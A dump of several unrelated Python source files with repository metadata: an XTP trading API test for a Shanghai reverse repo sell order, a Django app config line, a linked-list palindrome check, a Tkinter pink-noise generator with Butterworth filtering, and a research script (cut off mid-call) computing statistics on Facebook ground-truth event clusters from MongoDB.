caa434acc7d304b0c285e9a771010088d560dbc5 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/ReverseRepo/YW_NHG_SHHG_019_GC003.py | 9f23f2cae281cc74a7cff9d8df2f7abdba2b90e2 | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,025 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_NHG_SHHG_019_GC003(xtp_test_case):
# YW_NHG_SHHG_019_GC003
def test_YW_NHG_SHHG_019_GC003(self):
title = '上海逆回购--数量(等于100万张)-3天'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': '',
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('204003', '1', '12', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_REPO'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': stkparm['随机中间价'],
'quantity': 1000000,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
| [
"418033945@qq.com"
] | 418033945@qq.com |
226311f958f485ae3e09e79dde03c03782a6b7fc | 2f0e14f919dd01aad3e48c5543c81eb3c5c5a348 | /apitest/__init__.py | 536c4e7f37cc1eee633b9948289f1996162f3dc2 | [] | no_license | wangzhatian/DjangoDemo | d6542d4ebf54e05b19dc8d56127931b46d48b386 | 4471c59ab32f76a0f21df1ac3fb03ca60f5a0ff1 | refs/heads/master | 2020-12-03T14:45:22.588169 | 2020-12-03T09:40:15 | 2020-12-03T09:40:15 | 231,358,892 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47 | py | default_app_config="apitest.apps.ApitestConfig" | [
"17630366020@163.com"
] | 17630366020@163.com |
b39aaecd5ccb3f941f78537dc62d06709bf9d156 | dafbe82a8b21323e28b0912ad0896f504ba5fc7a | /4/is_palindrome_list.py | b575ba9996dab433a0243d1548c0a8137c7b6238 | [] | no_license | lxyshuai/Algorithm-primary-class-python | 4598d857eeff8f65af1ba42e13f72b7c16ab1fae | 36730e37a920459ca9e1d923611160f6346f4131 | refs/heads/master | 2020-03-28T10:58:37.562337 | 2018-10-14T11:57:46 | 2018-10-14T11:57:46 | 148,165,013 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,632 | py | # coding=utf8
"""
判断一个链表是否为回文结构
【题目】
给定一个链表的头节点head,请判断该链表是否为回文结构。
例如:
1->2->1,返回true。
1->2->2->1,返回true。
15->6->15,返回true。
1->2->3,返回false。
进阶:
如果链表长度为N,时间复杂度达到O(N),额外空间复杂度达到O(1)。
"""
class Node(object):
def __init__(self, value):
self.value = value
self.next = None
def is_palindrome(head):
if head == None or head.next == None:
return True
slow_node = head
fast_node = head
# slow_node去到链表中点
# and 前后不能调换,如果fast_node.next为None,fast_node.next.next报错
while fast_node.next != None and fast_node.next.next != None:
fast_node = fast_node.next.next
slow_node = slow_node.next
# 反转后半部分链表
pointed_to_node = slow_node
changed_node = slow_node.next
slow_node.next = None
while changed_node != None:
next_to_be_changed_node = changed_node.next
changed_node.next = pointed_to_node
pointed_to_node = changed_node
changed_node = next_to_be_changed_node
# 从头和从尾往中点遍历
end = pointed_to_node
while head != None and end != None:
if head.value != end.value:
return False
head = head.next
end = end.next
return True
if __name__ == '__main__':
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(2)
head.next.next.next.next = Node(1)
print is_palindrome(head)
| [
"kobexyluo@tencent.com"
] | kobexyluo@tencent.com |
a74807dd1e81c528164b688e80edeb4cc803d732 | e16c4a24c3bf0ea0db23935c645381c59670b029 | /experiments/python/vibrationdata_gui_python_4_6_15/vb_pink_noise_gui.py | ddfb68c5e8df9f38d4674fa2e8f6f18fdfcf3a1c | [] | no_license | ceramicspeed/vibrationanalysis | 6b00efa39eb4430e596235b4302f2803606c8d8d | 248500f40e4aed886eb2732f86654c0f138c8e93 | refs/heads/master | 2021-01-25T05:56:10.450358 | 2017-04-05T15:44:32 | 2017-04-05T15:44:32 | 80,701,922 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,891 | py | ################################################################################
# program: vb_pink_noise_gui.py
# author: Tom Irvine
# Email: tom@vibrationdata.com
# version: 1.2
# date: September 5, 2014
# description: Generate pink noise
#
################################################################################
#
# Note: for use within Spyder IDE, set:
#
# Run > Configuration > Interpreter >
#
# Excecute in an external system terminal
#
################################################################################
from __future__ import print_function
import sys
if sys.version_info[0] == 2:
print ("Python 2.x")
import Tkinter as tk
from tkFileDialog import asksaveasfilename
if sys.version_info[0] == 3:
print ("Python 3.x")
import tkinter as tk
from tkinter.filedialog import asksaveasfilename
from scipy.signal import lfilter
from numpy import histogram,pi,tan,cos,sin,zeros,std,sqrt,flipud,complex128
import matplotlib.pyplot as plt
from vb_utilities import WriteData2,signal_stats
from scipy.fftpack import fft,ifft
import random
class vb_pink_noise:
def __init__(self,parent):
self.master=parent # store the parent
top = tk.Frame(parent) # frame for all class widgets
top.pack(side='top') # pack frame in parent's window
self.master.minsize(400,400)
self.master.geometry("500x500")
self.master.title("vb_pink_noise_gui.py ver 1.2 by Tom Irvine")
self.TT=[]
self.a =[]
self.np=0
self.lpf=0
crow=0
self.hwtext1=tk.Label(top,text='Generate Pink Noise')
self.hwtext1.grid(row=crow, column=0, columnspan=2, pady=10,sticky=tk.SW)
crow=crow+1
self.hwtext2=tk.Label(top,text='Std Dev')
self.hwtext2.grid(row=crow, column=0, columnspan=1, pady=10,sticky=tk.SW)
self.hwtext7=tk.Label(top,text='Band Limit?')
self.hwtext7.grid(row=crow, column=1, columnspan=1, pady=10,sticky=tk.SW)
crow=crow+1
self.ampr=tk.StringVar()
self.ampr.set('')
self.amp_entry=tk.Entry(top, width = 10,textvariable=self.ampr)
self.amp_entry.grid(row=crow, column=0,padx=10, pady=1,sticky=tk.NW)
self.Lb1 = tk.Listbox(top,height=2,exportselection=0)
self.Lb1.insert(1, "yes")
self.Lb1.insert(2, "no")
self.Lb1.grid(row=crow, column=1, padx=5, pady=1,sticky=tk.NW)
self.Lb1.select_set(0)
self.Lb1.bind('<<ListboxSelect>>',self.filter_option)
crow=crow+1
self.hwtext2=tk.Label(top,text='Duration (sec)')
self.hwtext2.grid(row=crow, column=0, columnspan=1, pady=10,sticky=tk.SW)
self.hwtext25=tk.Label(top,text='Low Pass Frequency (Hz)')
self.hwtext25.grid(row=crow, column=1, columnspan=1, pady=10,sticky=tk.SW)
crow=crow+1
self.durr=tk.StringVar()
self.durr.set('')
self.dur_entry=tk.Entry(top, width = 10,textvariable=self.durr)
self.dur_entry.grid(row=crow, column=0,padx=10, pady=1,sticky=tk.NW)
self.lpfr=tk.StringVar()
self.lpfr.set('')
self.lpf_entry=tk.Entry(top, width = 10,textvariable=self.lpfr)
self.lpf_entry.grid(row=crow, column=1,padx=10, pady=1,sticky=tk.NW)
self.lpf_entry.config(state = 'normal')
crow=crow+1
self.hwtext4=tk.Label(top,text='Sample Rate (Hz)')
self.hwtext4.grid(row=crow, column=0, columnspan=1, pady=10,sticky=tk.SW)
crow=crow+1
self.srr=tk.StringVar()
self.srr.set('')
self.sr=tk.Entry(top, width = 10,textvariable=self.srr)
self.sr.grid(row=crow, column=0,padx=10, pady=1,sticky=tk.NW)
crow=crow+1
self.button_calculate = tk.Button(top, text="Calculate", command=self.calculation)
self.button_calculate.config( height = 2, width = 12)
self.button_calculate.grid(row=crow, column=0,columnspan=1, padx=10,pady=20)
self.button_ex = tk.Button(top, text="Export Data", command=self.export)
self.button_ex.config( height = 2, width = 12,state = 'disabled' )
self.button_ex.grid(row=crow, column=1,columnspan=1, padx=10,pady=3)
root=self.master
self.button_quit=tk.Button(top, text="Quit", command=lambda root=root:quit(root))
self.button_quit.config( height = 2, width = 12 )
self.button_quit.grid(row=crow, column=2,columnspan=1, padx=10,pady=20)
def filter_option(self,val):
sender=val.widget
n= int(sender.curselection()[0])
if(n==0):
self.lpf_entry.config(state = 'normal')
else:
self.lpfr.set('')
self.lpf_entry.config(state = 'disabled')
###############################################################################
def calculation(self):
n= int(self.Lb1.curselection()[0])
sigma=float(self.ampr.get())
sr=float(self.srr.get())
dur=float(self.durr.get())
dt=1./sr
self.np=int(dur/dt)
mu=0
for i in range(0,int(2*self.np)):
self.a.append(random.gauss(mu, sigma))
self.z =fft(self.a)
num=len(self.z)
self.z/=float(num)
epi=8*pi
tpi=2*pi
df=1./(num*dt);
nh=int(num/2.)
H=zeros(nh,complex128);
for i in range(0,nh):
s=(1j)*(i-1)*tpi*df
H[i]=3/sqrt(s+epi)
# print(H.dtype)
nf=nh
frf=zeros(num,complex128)
frf_amp=zeros(num,complex128)
A=zeros(num,complex128)
frf[0:nf-1]=H[0:nf-1]
aa=H
bb= flipud(aa)
for i in range(0,nf):
frf[i+nf]=bb[i].conjugate();
nf=2*nf
print(frf.dtype)
frf_amp=flipud(frf)
# print(frf_amp.dtype)
# print(self.z.dtype)
# print(A.dtype)
for i in range(0,num):
A[i]=frf_amp[i]*self.z[i]
pink=ifft(A).real
self.a=pink[1:self.np-1]
length_a=len(self.a)
for i in range(0,length_a):
self.TT.append(i*dt)
if(n==0):
self.lpf=float(self.lpfr.get())
if(self.lpf>0.3*sr):
self.lpf=0.3*sr
self.a=vb_pink_noise.Butterworth_filter(self.TT,self.a,length_a,self.lpf,dt)
print (" ")
print ("Signal statistics")
sd=std(self.a)
self.a*=sigma/sd
sr,dt,ave,sd,rms,skewness,kurtosis,dur=signal_stats(self.TT, self.a,length_a)
plt.ion()
plt.clf()
plt.figure(1)
plt.plot(self.TT, self.a, linewidth=1.0,color='b') # disregard error
plt.grid(True)
plt.xlabel('Time (sec)')
plt.ylabel('Amp')
plt.title('Pink Noise Time History')
plt.draw()
plt.figure(2)
hist, bins = histogram(self.a, bins=21, density=False)
width = 0.7*(bins[1]-bins[0])
center = (bins[:-1]+bins[1:])/2
plt.bar(center, hist, align = 'center', width = width)
plt.ylabel('Counts')
plt.xlabel('Amplitude')
plt.title('Histogram')
plt.draw()
self.button_ex.config(state = 'normal' )
@classmethod
def Butterworth_filter(cls,ttime,y,np,f,dt):
l=6 # sixth-order
a=zeros((4,4),'f')
b=zeros((4,4),'f')
s=(1+1j)*zeros(20,'f')
################################################################################
a,b=vb_pink_noise.coefficients(a,b,dt,f,l,np,s)
y=vb_pink_noise.apply(a,b,ttime,y)
return y
@classmethod
def apply(cls,a,b,ttime,y):
ns=len(y)
# cascade stage 1
print("\n stage 1")
ik=1
yt=vb_pink_noise.stage1(ns,a,b,y,ik)
# cascade stage 2
print(" stage 2")
ik=2
y=vb_pink_noise.stage2(ns,a,b,yt,ik)
# cascade stage 3
print(" stage 3")
ik=3
yt=vb_pink_noise.stage1(ns,a,b,y,ik)
y=yt
# sd=std(y)
return y
@classmethod
def stage1(cls,ns,a,b,y,ik):
yt=zeros(ns,'f')
bc=b[ik][0:3]
ac=a[ik][0:3]
ac[0]=1
yt=lfilter(bc, ac, y, axis=-1, zi=None)
return yt
@classmethod
def stage2(cls,ns,a,b,yt,ik):
y=zeros(ns,'f')
bc=b[ik][0:3]
ac=a[ik][0:3]
ac[0]=1
y=lfilter(bc, ac, yt, axis=-1, zi=None)
return y
@classmethod
def coefficients(cls,a,b,dt,f,l,np,s):
#*** normalize the frequency ***
targ=pi*f*dt # radians
print (" targ = %8.4g " %targ)
om=tan(targ)
print (" om = %8.4g " %om)
#*** solve for the poles *******
a1,a2,a3,s=vb_pink_noise.poles(np,s,l,f)
#*** solve for alpha values ****
print("\n alpha ")
alpha=zeros(2*l,'f')
alpha=2*s.real
## for i in range(0,len(alpha)):
## print (" %5.3f +j %5.3f " %(alpha[i].real,alpha[i].imag))
#*** solve for filter coefficients **
a,b=vb_pink_noise.lco(om,l,a,b,alpha)
#*** plot digital transfer function **
# dtrans();
#*** check stability ****************
vb_pink_noise.stab(l,a)
return a,b
@classmethod
def lco(cls,om,l,a,b,alpha):
print ("lco")
om2=om**2
print (om2)
print (alpha)
for k in range(1,int((l/2)+1)):
den = om2-alpha[k-1]*om+1.
print (den)
a[k][0]=0.
a[k][1]=2.*(om2 -1.)/den
a[k][2]=( om2 +alpha[k-1]*om+ 1.)/den
b[k][0]=om2/den
b[k][1]=2.*b[k][0]
b[k][2]=b[k][0]
print ("\n filter coefficients")
print (" a[%i][1]=%10.5g a[%i][2]=%10.5g" %(k,a[k][1],k,a[k][2]))
print (" b[%i][0]=%10.5g b[%i][1]=%10.5g b[%i][2]=%10.5g" %(k,b[k][0],k,b[k][1],k,b[k][2]))
return a,b
@classmethod
def poles(cls,np,s,l,freq):
arg=0
a1=0
a2=complex(0.,0.)
h=complex(0.,0.)
theta=complex(0.,0.)
s=(1+1j)*zeros(20,'f')
# print("\n calculate print ")
print ("\n poles ")
for k in range(0,int(2*l)):
arg=(2.*(k+1) +l-1)*pi/(2.*l)
s[k]=cos(arg)+sin(arg)*(1j)
print (" %4.3f +j %4.3f " %(s[k].real,s[k].imag))
for i in range(0,201):
arg = i/40.
h=complex( s[0].real,( arg - s[0].imag ))
for j in range(1,int(l)):
theta=complex( -s[j].real,( arg - s[j].imag ))
temp=h*theta
h=temp
x=1/h
h=x
a1 = freq*arg
a2=abs(h)
a3 = a2**2
return a1,a2,a3,s
@classmethod
def stab(cls,l,a):
a1=0
d1=0
d2=0
d3=0
dlit=0
at1=0
at2=0
als=0.5e-06
h2=0
als*=6.
print ("\n stability reference threshold= %14.7e " %als)
for i in range(1,int((l/2)+1)):
at1= -a[i][1]
at2= -a[i][2]
# print("\n\n stability coordinates: (%12.7g, %14.7g) ",at1,at2)
h2=at2
a1=h2-1.
d3=at1-a1
a1=1.-h2
d2=a1-at1
d1=at2+1.
# print("\n d1=%14.5g d2=%14.5g d3=%14.5g",d1,d2,d3)
dlit=d1
if(dlit > d2):
dlit=d2
if(dlit > d3):
dlit=d3
print ("\n stage %ld dlit= %14.5g " %(i, dlit))
if(dlit > als):
print (" good stability")
if( (dlit < als) and (dlit > 0.)):
print(" marginally unstable ")
if(dlit < 0.):
print (" unstable ")
print ("\n")
################################################################################
def export(self):
output_file_path = asksaveasfilename(parent=self.master,\
title="Enter the output filename")
output_file = output_file_path.rstrip('\n')
self.np=len(self.TT)
WriteData2(self.np,self.TT,self.a,output_file)
def quit(root):
root.destroy() | [
"mortenopprudjakobsen@mortens-MacBook-Pro.local"
] | mortenopprudjakobsen@mortens-MacBook-Pro.local |
e28c6068b08233751108e44a68f3829d31617344 | 8229176ba618c08e23e47ca4b0a7c1ebeef4d994 | /src/DescriptiveStats.py | 6430639afb563b8258f98091b749e8a170eef2d0 | [] | no_license | benblamey/ben_phd_python | 703997daef090941b2e679dfee1cff78d475fa5f | 7518784270410e2afdb2adfebf97fa1f4286449f | refs/heads/master | 2021-05-04T11:09:21.582715 | 2017-09-18T20:43:32 | 2017-09-18T20:43:32 | 47,449,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,702 | py | from core import *
# Import Datum Types from CSV file
def do_descriptiveStats():
global total_gt_datums
# See: ExportGroundTruthDatumEventTypes in Java.
# a table of the different kinds of datums was exported to CSV (for all user lifestories)
# { ID : datum-classname }
# all the datums -- not just the ground truth datums.
datum_types = {}
# Two strategies for life story selection:
#- Use the latest life story always - recommended for most things - maximizes Ground truth data which "exists" in the life stories (38 missing vs. 104)
#- Use the life story which matches the gold gate doc -this is the only strategy suitable for gold labelling text eval. */
with open(data_dir + 'DatumTypesForPython.csv', 'r') as csvfile: # LATEST
#- these are slightly older and contain slightly more datums!!!!!!!!!!!!!
spamreader = csv.reader(csvfile, delimiter=',')
for row in spamreader:
datum_types[row[0]] = row[1]
print(set(datum_types.values()))
if (len(set(datum_types.keys())) != total_gt_datums):
print("Number of GT datums defined in core.py = " + str(total_gt_datums))
print("Number of GT datums in DatumTypesForPython.csv = " + str(len(set(datum_types.keys()))))
# raise Exception("gt datum count does not match")
pp = pprint.PrettyPrinter(indent=4)
client = pymongo.MongoClient("localhost", 27017) # previously using 1234 for tunnel.
users = client.SocialWorld.users
print("number of users: " + str(users.count()))
data = []
excluded_datums = 0
for user in users.find():
print(user["FACEBOOK_USER_ID"])
if (user[u"FACEBOOK_USER_ID"] == u"16457018212"):
continue # Unknown randomer
if (user[u"FACEBOOK_USER_ID"] == u"836555706"):
continue # Muhamed Mustafa
if (user[u"FACEBOOK_USER_ID"] == u"100005149806497"):
continue # Felix Smith
if "GROUND_TRUTH_EVENTS" in user:
fullname = user[u"FACEBOOK_FIRST_NAME"] + user[u"FACEBOOK_LAST_NAME"]
print("fullname: " + fullname) #.encode(sys.stdout.encoding, errors = 'replace'))
usergts = user["GROUND_TRUTH_EVENTS"]
data_user = []
for gtec in usergts["events"]:
data_user_datums = []
# lookup the datum IDs in the dictionary
# [3:] #strip off 'fb_' at the start
for datum in gtec["datums"]:
datum_num_id = datum['id']
if (datum_num_id.startswith('fb_')):
datum_num_id = datum_num_id[3:]
# We exclude datums that are missing from the latest life story.
if (datum_num_id in datum_types):
datumtype = datum_types[datum_num_id]
data_user_datums.append((datum_num_id, datumtype))
else:
excluded_datums += 1
if (len(data_user_datums) > 0):
data_user.append(data_user_datums)
if (len(data_user)>0):
data.append(data_user)
table_data = []
table_data.append(("Participants", users.count()))
table_data.append(("...who created ground truth event clusters",len(data)))
table_data.append(("Total ground truth event clusters",
sum(len(user) for user in data)))
table_data.append(("Mean clusters per user",
"{:.2f}".format(
float(sum(len(user) for user in data))/ # no of clusters
users.count()) # no of users
))
total_gt_datums_calc = len(list(chain.from_iterable(chain.from_iterable(data))))
print("total_gt_datums: ")
print(total_gt_datums)
print("total_gt_datums_calc: ")
print(total_gt_datums_calc) # GT datums from MongoDB
assert(total_gt_datums == total_gt_datums_calc)
table_data.append(("Total datums in ground truth clusters", total_gt_datums))
table_data.append(("Mean datums per cluster",
"{:.2f}".format(
float(len(list(chain.from_iterable(chain.from_iterable(data))))) # total datums
/sum(len(user) for user in data) # total clusters
)
))
#print "List of Number of Ground Truth Event Clusters per User"
number_of_gt_events_per_user = list(len(user_events) for user_events in data)
#pp.pprint(number_of_gt_events_per_user)
#print "List of Number of Datums per Ground Truth Event Cluster"
number_of_datums_per_gt_event_cluster = [len(list(gt_cluster)) for gt_cluster in chain.from_iterable(data)]
#pp.pprint(number_of_datums_per_gt_event_cluster)
#table_data.append(("Total ground truth event clusters", total_gtecs))
#table_data.append(("Total ground truth event cluster datums", total_gtecdatums))
print("#### Excluded Datums: " + str(excluded_datums) + "####") # under latest=38,gold_or_latest=?
pp.pprint(table_data)
# Generate Data for Bar Chart
# Frequency of Number of Ground Truth Event Clusters per User
# =========
gteventsizes = number_of_gt_events_per_user
xvalues = range(1,max(gteventsizes)+1)
gt_events_per_user_graph_data = [0] * max(gteventsizes)
print(xvalues)
for (x,f) in Counter(gteventsizes).items():
gt_events_per_user_graph_data[x-1] = f
print(gt_events_per_user_graph_data )
width = 1
xlabels = range(0,max(gteventsizes)+2, 2)
xlabels_positions = [x + 0.5 for x in xlabels]
xminorformatter = FixedLocator([x - 0.5 for x in xlabels])
bar(xvalues, gt_events_per_user_graph_data, width=width, linewidth=1)
yticks(range(0, max(gt_events_per_user_graph_data)+2))
xticks(xlabels_positions, xlabels)
xlabel("# Ground Truth Events for User")
ylabel("Frequency")
xlim(0, max(xlabels)+1)
# The function gca() returns the current axes - instance of http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes
gca().get_xaxis().set_minor_locator(xminorformatter)
gca().get_xaxis().tick_bottom()
gca().get_yaxis().tick_left()
savefig(phd_output_dir+"ch5_gen_freqGTusers.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_freqGTusers.pdf", dpi=600, figsize=(8, 6))
#title("Frequency of Number of Ground Truth Event Clusters per User")
# Frequency of Number of Datums per Ground Truth Event Cluster
# ============================================================
gtecsizes = number_of_datums_per_gt_event_cluster
xvalues = range(1,max(gtecsizes)+1)
datums_per_event_cluster_graph_data = [0] * max(gtecsizes)
print(xvalues)
for (x,f) in Counter(gtecsizes).items():
datums_per_event_cluster_graph_data[x-1] = f
print(datums_per_event_cluster_graph_data )
#import numpy
#xlocations = numpy.array(range(len(gteventsizes)))+0.5
#xlocations = xlocations+ width/2 * 2
#print xlocations
width = 1
xlabels = range(0,max(gtecsizes)+2, 2)
xlabels_positions = [x + 0.5 for x in xlabels]
xminorformatter = FixedLocator([x - 0.5 for x in xlabels])
#print xlocations
#import matplotlib.font_manager as font_manager
#prop = font_manager.FontProperties(fname='C:/windows/fonts/cmunrm.ttf')
#mpl.rcParams['font.family'] = prop.get_name()
#font = {'family' : prop.get_name(),
# #'weight' : 'bold',
# #'size' : 10
# }
#rcParams['font.family'] = 'serif'
# font.cursive: [u'Apple Chancery', u'Textile', u'Zapf Chancery', u'Sand', u'cursive']
#font.family: [u'serif']
#font.fantasy: [u'Comic Sans MS', u'Chicago', u'Charcoal', u'ImpactWestern', u'fantasy']
#font.monospace: [u'Bitstream Vera Sans Mono', u'DejaVu Sans Mono', u'Andale Mono', u'Nimbus Mono L', u'Courier New', u'Courier', u'Fixed', u'Terminal', u'monospace']
#font.sans-serif: [u'Bitstream Vera Sans', u'DejaVu Sans', u'Lucida Grande', u'Verdana', u'Geneva', u'Lucid', u'Arial', u'Helvetica', u'Avant Garde', u'sans-serif']
#font.serif: [u'CMU Serif']
#rcParams['font.fantasy'] = prop.get_name()
#rcParams['font.monospace'] = prop.get_name()
#rcParams['font.sans-serif'] = prop.get_name()
#rcParams['font.serif'] = prop.get_name()
#print rcParams
bar(xvalues, datums_per_event_cluster_graph_data, width=width, linewidth=1)
yticks(range(0, max(datums_per_event_cluster_graph_data)+10, 10))
xticks(xlabels_positions, xlabels)
xlim(0, max(xlabels)+1)
xlabel("# Datums in Ground Truth Event Cluster")#, fontdict=font)
ylabel("Frequency")
# The function gca() returns the current axes - instance of http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes
gca().get_xaxis().set_minor_locator(xminorformatter)
gca().get_xaxis().tick_bottom()
gca().get_yaxis().tick_left()
savefig(phd_output_dir+"ch5_gen_freqGTevents.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_freqGTevents.pdf", dpi=600, figsize=(8, 6))
#title("Frequency of Number of Datums per Ground Truth Event Cluster")
# Types in GT Event Clusters
# =======
# In[6]:
datum_type_counts = Counter()
for user in data:
for gt_event_cluster in user:
for datum in gt_event_cluster:
datum_type = datum[1]
datum_type_counts[datum_type] += 1
pretty_labels = {
'benblamey.saesneg.model.datums.DatumPhoto': 'Photo',
'benblamey.saesneg.model.datums.DatumStatusMessage': 'Status Message',
'benblamey.saesneg.model.datums.DatumCheckin': 'Check-In',
'benblamey.saesneg.model.datums.DatumEvent': 'Facebook Event',
'mixed': '(Mixed)',
}
#t = sum(x_list)
#cluster_type_comp_table_data = zip(label_list, x_list, [("{:.2f}".format(
# (float(x)/t) * 100) + "\%") # \% is for latex.
# for x in x_list ])
label_list = [pretty_labels[key] for key in datum_type_counts.keys()]
values = datum_type_counts.values()
datum_type_table_data = zip(label_list, values)
#cluster_type_comp_table_data = sorted(cluster_type_comp_table_data, key=lambda x: x[1], reverse=True) # %'s are strings! sort on col.2
#cluster_type_comp_table_data.reverse()
#print cluster_type_comp_table_data
hr = ['Type','Frequency']
datum_type_table_data.append(("\midrule Total", sum(values)))
t = matrix2latex.matrix2latex(datum_type_table_data,
headerRow = hr,
filename=phd_output_dir+'ch5_table_gen_datums_by_type',
caption='Frequency of Datum by Type',
alignment='r r')
print(t)
# In[7]:
#Number of types in each gt event cluster
types_in_gt_clusters = [set([datum[1] for datum in gt_event_cluster]) for gt_event_cluster in list(chain.from_iterable(data))]
#pp.pprint(types_in_gt_clusters)
gt_cluster_type_counter = Counter()
for types in types_in_gt_clusters:
if (len(types) == 1):
type = next(iter(types))
else:
type = 'mixed'
gt_cluster_type_counter[type] += 1
pp.pprint(gt_cluster_type_counter)
# In[8]:
print(gt_cluster_type_counter.keys())
label_list = [pretty_labels[label] for label in gt_cluster_type_counter.keys()]
x_list = gt_cluster_type_counter.values()
clf()
axis("equal")
pie(
x_list,
labels=label_list,
autopct=None,
#startangle=45
#autopct="%1.1f%%",
#pctdistance=0.8
)
#savefig(phd_output_dir+"ch5_gen_GTtypepie.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_GTtypepie.pdf", dpi=600, figsize=(8, 6))
# In[9]:
t = sum(x_list)
cluster_type_comp_table_data = zip(label_list, x_list, [("{:.2f}".format(
(float(x)/t) * 100) + "\%") # \% is for latex.
for x in x_list ])
cluster_type_comp_table_data = sorted(cluster_type_comp_table_data, key=lambda x: x[1], reverse=True) # %'s are strings! sort on col.2
#cluster_type_comp_table_data.reverse()
print(cluster_type_comp_table_data)
hr = ['Type(s) in Event Cluster','Frequency','']
cluster_type_comp_table_data.append(("\midrule Total", t, ""))
t = matrix2latex.matrix2latex(cluster_type_comp_table_data,
headerRow = hr,
filename=phd_output_dir+'ch5_table_gen_gt_comp_by_type',
caption='Ground Truth Cluster Datums by Type',
alignment='r r r')
print(t)
# X-Type Matrix
# ====
# Postive/Intra Cases
cross_types_matrix = Counter()
all_types = Set()
for user in data:
for gtec in user:
for x in gtec:
x_id = x[0]
x_type = x[1]
all_types.add(x_type)
for y in gtec:
y_id = y[0]
y_type = y[1]
if (x_type > y_type):
continue
if (x_id == y_id):
continue
types = [x_type,y_type]
types.sort()
types = tuple(types)
cross_types_matrix[types] += 1
pp.pprint (cross_types_matrix)
print((all_types))
# Negative/Inter Cases
inter_cross_types_matrix = Counter()
for user in data:
for cluster_x in user:
for cluster_y in user:
if (cluster_x == cluster_y): # this works.
continue
for x_datum in cluster_x:
x_type = x_datum[1]
for y_datum in cluster_y:
y_type = y_datum[1]
if (x_type > y_type):
continue
types = [x_type,y_type]
types.sort()
types = tuple(types)
inter_cross_types_matrix[types] += 1
# In[12]:
all_types_sorted = list(all_types)
all_types_sorted.sort()
all_types_sorted_reversed = list(all_types_sorted)
all_types_sorted_reversed.reverse()
pair_table_data = []
header_row = list(all_types_sorted)
header_row = [pretty_labels[typestring] for typestring in header_row]
header_row.insert(0,"")
xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
xtype_table_data.append(table_row)
matrix2latex.matrix2latex(xtype_table_data,
filename=phd_output_dir+"ch7_table_gen_intra_xtype_cluster",
caption="Intra-Cluster Datum Pairs by Type (Positive Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("Total intra-cluster (positive) datum pairs",
sum(count for count in cross_types_matrix.values())))
inter_xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = inter_cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
inter_xtype_table_data.append(table_row)
matrix2latex.matrix2latex(inter_xtype_table_data,
filename=phd_output_dir+"ch7_table_gen_inter_xtype_cluster",
caption="Inter-Cluster Datum Pairs by Type (Negative Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("Total inter-cluster (negative) datum pairs",
sum(count for count in inter_cross_types_matrix.values())))
inter_xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = inter_cross_types_matrix[(t1, t2)] + cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
inter_xtype_table_data.append(table_row)
matrix2latex.matrix2latex(inter_xtype_table_data,
